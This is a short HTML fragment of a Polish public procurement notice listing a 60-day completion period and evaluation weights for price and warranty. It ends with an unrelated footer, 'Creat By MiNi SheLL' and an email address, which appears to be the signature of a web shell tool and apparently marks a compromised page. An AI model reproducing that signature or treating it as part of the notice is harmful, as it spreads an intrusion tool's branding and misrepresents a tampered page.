<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. okres gwarancji - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com